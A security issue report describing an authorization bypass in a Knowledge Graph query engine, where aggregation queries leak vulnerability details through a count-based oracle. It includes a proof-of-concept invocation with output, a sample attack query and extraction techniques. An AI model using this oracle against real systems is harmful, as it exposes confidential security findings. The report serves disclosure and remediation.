Aggregation queries bypass per-entity authorization for target nodes
## Summary
Aggregation queries in the Knowledge Graph query engine do not enforce
per-entity authorization (redaction) on the target node — only on the
`group_by` node. This allows a user with `read_project` but without
`read_vulnerability` to extract full vulnerability details (count, IDs,
severity, state, report type, title, timestamps) for any project within
their namespace scope.
## Reproduction
Attached: [aggregation_inference.py](/uploads/73ebfca273daaf483549a146b09f208b/aggregation_inference.py)
```bash
python3 aggregation_inference.py \
--gitlab-url http://gdk.test:8080 \
--token <PAT_WITH_REPORTER_ROLE_ONLY> \
--project-id SOMEPROJECCT
```
The script extracts vulnerability details using only aggregation queries.
No `read_vulnerability` ability is required or checked.
Example output:
```
[*] Phase 1: Counting vulnerabilities via aggregation...
Vulnerabilities found: 1
[*] Phase 2: Extracting severity distribution...
critical: 1
[*] Phase 5: Extracting individual vulnerability IDs...
Found 1 vulnerability IDs: [399]
[*] Phase 6: Extracting details for 1 vulnerabilities...
--- Vulnerability ID: 399 ---
severity: critical
state: detected
report_type: generic
title: 'test vuln'
created_at: 2026-03-24
```
## Root Cause
### 1. Compiler only adds redaction columns for `group_by` nodes
In `crates/query-engine/compiler/src/enforce.rs` (lines 133-143), the
`selectable_nodes` set for aggregation queries is built exclusively from
`group_by` aliases:
```rust
let selectable_nodes: HashSet<&str> = match input.query_type {
QueryType::Aggregation => input
.aggregations
.iter()
.filter_map(|agg| agg.group_by.as_deref())
.collect(),
// ...
};
```
Later (lines 193-198), nodes not in `selectable_nodes` are skipped — no
`_gkg_{alias}_id` or `_gkg_{alias}_type` columns are added for the target
node. This is explicitly tested at line 554 (`aggregation_only_adds_columns_for_group_by_nodes`).
### 2. `resource_checks()` never collects target node IDs
In `crates/query-engine/types/src/query_result.rs` (line 263),
`resource_checks()` iterates over `self.ctx.nodes()`. Since the target
node was never added to the `ResultContext`, its IDs are never collected
for the Rails authorization exchange.
### 3. Authorization stage skips unchecked entity types
In the authorization stage, when `resource_checks()` returns no checks for
the Vulnerability type, no `read_vulnerability` call is made to Rails. The
rows pass through with only the `group_by` node (Project) being authorized.
### 4. Target node filters ARE applied in SQL
Meanwhile, the target node's filters from the query JSON are applied in the
SQL `WHERE` clause via `build_full_where()` in `lower.rs`. This creates a
1-bit oracle: the attacker can test any filter condition on any target node
column and observe whether the count is 0 or 1.
## Attack Technique
The attacker uses aggregation queries with `group_by` on a node they CAN
access (Project) and `count` on a node they CANNOT access (Vulnerability):
```json
{
"query_type": "aggregation",
"nodes": [
{"id": "p", "entity": "Project", "node_ids": [40]},
{"id": "v", "entity": "Vulnerability", "filters": {"severity": "critical"}}
],
"relationships": [{"type": "IN_PROJECT", "from": "v", "to": "p"}],
"aggregations": [{"function": "count", "target": "v", "alias": "c", "group_by": "p"}]
}
```
The Project node is authorized (redaction checked), but the Vulnerability
node is not. The filter `{"severity": "critical"}` is applied in the SQL
WHERE clause and the resulting count (0 or 1) leaks whether the condition
matched.
By iterating through possible values, the attacker extracts:
| Field | Technique | Queries |
|-------|-----------|---------|
| Count | Single query | 1 |
| IDs | Binary search on `id` with `lte`/`lt` | O(N log max_id) |
| Enum fields (severity, state, report_type) | Test each value | O(values) |
| Boolean fields | Test true/false | 2 |
| String fields (title) | Character-by-character with `starts_with` | O(len * charset) |
| Timestamps | Binary search on year/month/day with `gte`/`lte` | O(log range) |
## Affected Entity Pairs
Any entity pair where the `group_by` node has a lower privilege requirement
than the `count` target:
- `read_project` without `read_vulnerability` → leak vulnerability details
- `read_project` without `read_security_resource` → leak security findings
- `read_merge_request` without `read_code` → leak file paths, definitions
- `read_project` without `read_build` → leak CI pipeline/job details
## Mitigation Options
1. **Add redaction for target nodes in aggregation queries.** The compiler
should add `_gkg_{alias}_id` and `_gkg_{alias}_type` for target nodes,
and `resource_checks()` should collect their IDs. Rows where the user
lacks the target entity's ability should return count 0.
2. **Validate abilities at query time.** Before compiling, check that the
requesting user has the required ability for ALL entity types in the
query, not just the `group_by` entities.
3. **Restrict filters on unauthorized entities.** If the user doesn't have
the target entity's ability, reject queries with filters on that entity's
columns (prevents the oracle).
4. **Rate-limit aggregation queries.** As a defense-in-depth measure, limit
the number of aggregation queries per user per time window to make the
binary search extraction impractical.
## Attachments
[aggregation_inference.py](/uploads/73ebfca273daaf483549a146b09f208b/aggregation_inference.py) proof of concept script
issue